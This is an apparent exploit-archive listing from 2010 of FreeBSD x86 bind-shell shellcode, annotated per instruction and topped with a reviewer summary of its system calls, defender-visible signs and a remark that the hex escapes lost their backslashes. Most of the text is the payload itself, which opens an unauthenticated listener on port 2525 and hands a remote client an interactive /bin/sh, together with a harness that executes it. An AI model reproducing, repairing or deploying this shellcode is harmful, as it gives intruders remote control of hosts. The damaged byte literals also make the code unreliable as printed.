bds/x86-bindshell on port 2525 shellcode 167 bytes
Posted on 23 April 2010
/*
 * -------------- bds/x86-bindshell on port 2525 167 bytes -------------------------
 * AUTHOR    : beosroot
 * OS        : BSDx86 (Tested on FreeBSD)
 * EMAIL     : beosroot@hotmail.fr beosroot@null.net
 * GR33TZ To : joseph-h, str0ke, MHIDO55,.....
 *
 * Listing as published on Inj3ct0r.com [2010-04-23].
 *
 * Reviewer summary, derived from the per-instruction comments below:
 * the payload issues a fixed sequence of `int $0x80` system calls whose
 * numbers match the FreeBSD i386 table: socket (0x61), bind (0x68),
 * listen (0x6a), accept (0x1e), close (0x06), dup2 (0x5a, three times) and
 * execve (0x3b). The net effect is an unauthenticated TCP listener on port
 * 2525 that hands the first client an interactive /bin/sh.
 *
 * What a defender can observe from this behaviour:
 *   - a process that suddenly owns a listening TCP socket on port 2525;
 *   - a /bin/sh started with argv "sh -i" whose descriptors 0, 1 and 2 all
 *     refer to a network socket;
 *   - no authentication or encryption on the channel, so host firewalling
 *     of unexpected inbound ports and W^X/NX memory policy are the relevant
 *     mitigations.
 *
 * NOTE(review): the hex escapes are printed without their leading
 * backslashes ("x6ax00" rather than an escaped byte pair), which looks like
 * extraction damage on the page. The literals are reproduced exactly as
 * shown; as written they are plain ASCII text, not the opcodes named in the
 * comments.
 */
const char shellcode[] =
    /* --- syscall 0x61 (97, socket): arguments 2, 1, 0 — AF_INET, SOCK_STREAM, protocol 0 --- */
    "x6ax00"            // push $0x0          protocol
    "x6ax01"            // push $0x1          type
    "x6ax02"            // push $0x2          domain
    "x50"               // push %eax          filler slot below the arguments (presumably the return-address slot the BSD int 0x80 convention expects)
    "x6ax61"            // push $0x61
    "x58"               // pop %eax           eax = syscall number
    "xcdx80"            // int $0x80

    /* --- syscall 0x68 (104, bind): build a 16-byte sockaddr_in on the stack --- */
    "x50"               // push %eax          keep the returned descriptor on the stack
    "x6ax00"            // push $0x0          zero padding / address 0.0.0.0 (any interface)
    "x6ax00"            // push $0x0
    "x6ax00"            // push $0x0
    "x6ax00"            // push $0x0
    "x68x10x02x09xdd"   // push $0xdd090210   bytes 10 02 09 dd: sin_len=16, sin_family=2, port 0x09dd = 2525
    "x89xe0"            // mov %esp,%eax      eax -> sockaddr
    "x6ax10"            // push $0x10         address length
    "x50"               // push %eax          address pointer
    "xffx74x24x1c"      // pushl 0x1c(%esp)   saved socket descriptor
    "x50"               // push %eax          filler slot
    "x6ax68"            // push $0x68
    "x58"               // pop %eax
    "xcdx80"            // int $0x80

    /* --- syscall 0x6a (106, listen): backlog 1 --- */
    "x6ax01"            // push $0x1          backlog
    "xffx74x24x28"      // pushl 0x28(%esp)   socket descriptor
    "x50"               // push %eax          filler slot
    "x6ax6a"            // push $0x6a
    "x58"               // pop %eax
    "xcdx80"            // int $0x80

    /* --- syscall 0x1e (30, accept): blocks until a client connects --- */
    "x83xecx10"         // sub $0x10,%esp     room for the peer address
    "x6ax10"            // push $0x10         length value (16)
    "x8dx44x24x04"      // lea 0x4(%esp),%eax eax -> peer address buffer
    "x89xe1"            // mov %esp,%ecx      ecx -> length value
    "x51"               // push %ecx          length pointer
    "x50"               // push %eax          address pointer
    "xffx74x24x4c"      // pushl 0x4c(%esp)   listening descriptor
    "x50"               // push %eax          filler slot
    "x6ax1e"            // push $0x1e
    "x58"               // pop %eax
    "xcdx80"            // int $0x80

    /* --- syscall 0x06 (6, close): presumably the listening socket — offsets not re-derived here --- */
    "x50"               // push %eax          keep the accepted descriptor on the stack
    "xffx74x24x58"      // pushl 0x58(%esp)
    "x50"               // push %eax          filler slot
    "x6ax06"            // push $0x6
    "x58"               // pop %eax
    "xcdx80"            // int $0x80

    /* --- syscall 0x5a (90, dup2) x3: target descriptors 0, 1, 2 (stdin, stdout, stderr) --- */
    "x6ax00"            // push $0x0          target fd 0
    "xffx74x24x0c"      // pushl 0xc(%esp)    source fd (presumably the accepted connection)
    "x50"               // push %eax          filler slot
    "x6ax5a"            // push $0x5a
    "x58"               // pop %eax
    "xcdx80"            // int $0x80
    "x6ax01"            // push $0x1          target fd 1
    "xffx74x24x18"      // pushl 0x18(%esp)
    "x50"               // push %eax
    "x6ax5a"            // push $0x5a
    "x58"               // pop %eax
    "xcdx80"            // int $0x80
    "x6ax02"            // push $0x2          target fd 2
    "xffx74x24x24"      // pushl 0x24(%esp)
    "x50"               // push %eax
    "x6ax5a"            // push $0x5a
    "x58"               // pop %eax
    "xcdx80"            // int $0x80

    /* --- syscall 0x3b (59, execve): path "/bin/sh", argv {"sh", "-i", NULL}, envp NULL --- */
    "x68x73x68x00x00"   // push $0x6873       "sh" + NUL
    "x89xe0"            // mov %esp,%eax      eax -> "sh"
    "x68x2dx69x00x00"   // push $0x692d       "-i" + NUL
    "x89xe1"            // mov %esp,%ecx      ecx -> "-i"
    "x6ax00"            // push $0x0          argv terminator
    "x51"               // push %ecx          argv[1]
    "x50"               // push %eax          argv[0]
    "x68x2fx73x68x00"   // push $0x68732f     "/sh" + NUL
    "x68x2fx62x69x6e"   // push $0x6e69622f   "/bin"
    "x89xe0"            // mov %esp,%eax      eax -> "/bin/sh"
    "x8dx4cx24x08"      // lea 0x8(%esp),%ecx ecx -> argv array
    "x6ax00"            // push $0x0          envp = NULL
    "x51"               // push %ecx          argv
    "x50"               // push %eax          path
    "x50"               // push %eax          filler slot
    "x6ax3b"            // push $0x3b
    "x58"               // pop %eax
    "xcdx80";           // int $0x80

/*
 * Test harness: casts the byte array to a function pointer and calls it.
 *
 * NOTE(review): `hell` is assigned but never used; the call goes through a
 * second, separate cast of `shellcode`.
 * NOTE(review): `shellcode` is a const array, so it normally lands in
 * read-only data. On systems that enforce non-executable data pages the call
 * is expected to fault rather than run — confirm against the target's
 * memory-protection settings before drawing conclusions from a test run.
 */
int main()
{
    void (*hell)() = (void *)shellcode;
    return (*(int(*)())shellcode)();
}

// the end o.O